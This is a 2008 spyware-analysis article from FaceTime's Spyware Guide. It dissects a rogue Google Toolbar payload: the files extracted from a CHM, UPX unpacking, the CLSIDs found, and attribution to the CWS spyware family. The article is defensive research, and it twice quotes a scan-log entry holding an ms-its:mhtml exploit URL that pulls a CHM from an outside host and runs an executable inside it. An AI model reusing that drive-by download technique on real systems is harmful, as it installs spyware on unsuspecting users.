Dissection of Rogue Google Toolbar Payload
by Chris Criswell, Wayne Porter
For background on this supporting article see Boyd: "The Rogue Google Toolbar: History and Variants"
For testing purposes the CHM file (File Extension for a Microsoft Compressed HTML Help Files)?was acquired and decompiled using specialized forensic tools.
Three files emerged from this analysis:
- Index.exe
- index.html
- index.hhp
Install.exe was unpacked using UPX1
pqnelhleyy 26673f11 486ed56e
BinText was utilized to?view contents.
Two CLSIDs were located: For more information see Wikipedia entry on Globally Unique Identifiers of which the
CLSID (class identifier)?is a GUID subtype.
000079A8?? 004079A8????? 0?? SOFTWARE\Microsoft\Code Store Database\Distribution Units\{E427A57F-1A94-0BFC-6D7A-6DC214946AD4}
00007A0C?? 00407A0C????? 0?? SOFTWARE\Microsoft\Code Store Database\Distribution Units\{11111111-1111-1111-1111-111111111157}
First CLSID:? {E427A57F-1A94-0BFC-6D7A-6DC214946AD4}
Using standard search procedures it was trivial to locate this CLSID via a search engine query which returned the
following results:
?
CastleCops: http://castlecops.com/p598484-ABI_Network_direct_revenue.html
O16 - DPF: {E427A57F-1A94-0BFC-6D7A-6DC214946AD4} - ms-its:mhtml:file://c:\\nosuch.mht!http://users.perfhost.com/~zone14/z/index.chm::/index.exe
Tomcoyote: http://tomcoyote.org/forums/lofiversion/index.php/t43312.html
O16 - DPF: {E427A57F-1A94-0BFC-6D7A-6DC214946AD4} - ms-its:mhtml:file://c:\\nosuch.mht!http://users.perfhost.com/~zone14/z/index.chm::/index.exe
Of notable interest regarding this exploit is the methodology discovered with analysis using X-RayPC, a FaceTime process forensic tool,
The result is highlighted in yellow.
This string shows up in the downloaded files area (Active X portion) of X-RayPC.
ms-its: mhtml:file://
This search string can be chronologically located as far back?as 2003.?
The sample below is from May 26, 2004
Reference Spywareinfo.com Forums: http://forums.spywareinfo.com/lofiversion/index.php/t2561.html
Second CLSID: {11111111-1111-1111-1111-111111111157}
Reference CastleCops: http://castlecops.com/atx-200.html
Reference: WildersSecurity.com http://www.wilderssecurity.com/showthread.php?p=182524
Based on the CLSIDs and other behaviors the file exhibits it is apparent the responsible parties are related to or are controlled by the CWS family of spyware.
1. Executable Packing is the process of compressing an executable file and
prepending adecompression stub, which is responsible for decompressing the
executable and initiating execution. The decompression stub is a standalone executable,
making packed and unpacked executables indistinguishable to the casual user as they are
not required to perform any additional steps to start execution. Software distributors
use executable packing for a variety of reasons, primarily to reduce the secondary storage
requirements of their software, however as UPX is specifically designed to compress executable
code it often achieves better compression ratios than standard data compression facilities
such as gzip, zip or bzip2. Source: Wikipedia
Unless otherwise
noted this article is Copyright © 2008
by FaceTime Communications, Inc. This article may not be resold,
reprinted, or redistributed for compensation of any kind without
prior written permission from FaceTime
Communications, Inc. For reprint or media inquires please contact
us with the phrase "Spyware
Guide Articles" in the subject line and we will by happy
to assist you. Links to this article from other websites are appreciated
and encouraged. Users are also encouraged to utilize our RSS
system to provide unique content and extracts for their site.
Related Articles
Read other articles (back to
full list)
|
